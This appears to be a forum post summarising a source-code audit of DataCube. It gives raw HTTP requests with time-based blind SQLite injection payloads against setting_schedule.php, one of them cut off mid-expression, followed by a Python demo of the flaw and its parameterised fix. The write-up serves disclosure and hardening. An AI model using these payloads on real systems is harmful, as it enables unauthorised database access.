ToB企服应用市场:ToB评测及商务社交产业平台

Title: DataCube vulnerability summary

Author: 杀鸡焉用牛刀    Time: 2024-5-30 09:52
Title: DataCube vulnerability summary
Here I'm sharing some vulnerabilities found after pulling the DataCube source code and auditing it, including a front-end file upload, an information leak that exposes account credentials, and a back-end file upload. There are also some SQL injection flaws, but since DataCube uses a SQLite database, the SQL injection is of rather limited value. There may well be vulnerabilities I haven't found yet; feel free to discuss.
phpinfo leak

[img=720,145.64344746162928]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202405291536552.png[/img]

[img=720,114.61224489795919]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202405291536553.png[/img]

SQL injection

Blind SQL injection (no echoed output)

[img=720,312.07517619420514]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202405291536554.png[/img]

/DataCube/www/admin/setting_schedule.php
[img=720,278.24341279799245]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202405291536555.png[/img]

SQLite has no sleep() function, but randomblob(N) can be used to produce a delay. randomblob(N) is a commonly used SQLite function that generates a random binary string of the specified length.
[img=720,310.21875]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202405291536556.png[/img]

Normal request time
[code]POST /admin/setting_schedule.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close

datetime=2024-04-24+02%3A00'+or+randomblob(9000000000000000000000000)+and+'1&tbl_type=fs&delete=1[/code]
[img=720,310.78125]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202405291536557.png[/img]

Delayed response
Determining the SQLite version
[code]POST /admin/setting_schedule.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

datetime=-1'or+(case+when(substr(sqlite_version(),1,1)[/code]
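The root cause behind both requests above is the same: the `datetime` value is spliced into the SQL text of the delete query. The following is an added example (not DataCube's own code, which is PHP) that reconstructs that pattern in Python against an in-memory SQLite database and places the hardened version beside it: an allow-list for `tbl_type` (table names cannot be bound as parameters), a format check on `datetime`, and a bound parameter so any quote or `randomblob(...)`/`sqlite_version()` fragment is treated as a literal string. The table name `fs_schedule`, its columns and the sample rows are assumptions constructed for the demo.

```python
import re
import sqlite3

# Constructed sample table; name and columns are assumptions, not DataCube's real schema.
SCHEMA = """
CREATE TABLE fs_schedule (id INTEGER PRIMARY KEY, datetime TEXT NOT NULL);
INSERT INTO fs_schedule (datetime) VALUES
  ('2024-04-24 02:00'), ('2024-04-24 03:00'), ('2024-04-25 02:00');
"""

# The only shape the datetime field should ever have: YYYY-MM-DD HH:MM
DATETIME_RE = re.compile(r"^\d{4}-\d{2}-\d{2} \d{2}:\d{2}$")
ALLOWED_TBL_TYPES = ("fs",)  # allow-list for the tbl_type request field


def fresh_db():
    """New in-memory database with the constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def delete_schedule_unsafe(db, tbl_type, datetime):
    """Vulnerable pattern: request values concatenated into the SQL text."""
    sql = f"DELETE FROM {tbl_type}_schedule WHERE datetime = '{datetime}'"
    cur = db.execute(sql)
    db.commit()
    return cur.rowcount  # number of rows actually deleted


def delete_schedule_safe(db, tbl_type, datetime):
    """Hardened: allow-list the table, validate the value, bind it as a parameter."""
    if tbl_type not in ALLOWED_TBL_TYPES:
        raise ValueError("unknown tbl_type")
    if not DATETIME_RE.match(datetime):
        raise ValueError("datetime must look like YYYY-MM-DD HH:MM")
    # The '?' placeholder sends the value separately from the SQL text, so a
    # trailing "' or randomblob(...) and '1" can never change the query's structure.
    cur = db.execute(f"DELETE FROM {tbl_type}_schedule WHERE datetime = ?", (datetime,))
    db.commit()
    return cur.rowcount


def remaining(db):
    """Rows left in the sample table, for checking what each variant did."""
    return db.execute("SELECT COUNT(*) FROM fs_schedule").fetchone()[0]
```

With the unsafe variant a constructed tautology such as `2024-04-24 02:00' or 1=1 and '1` deletes every row; the safe variant rejects it before any query runs and deletes exactly one row for a well-formed value.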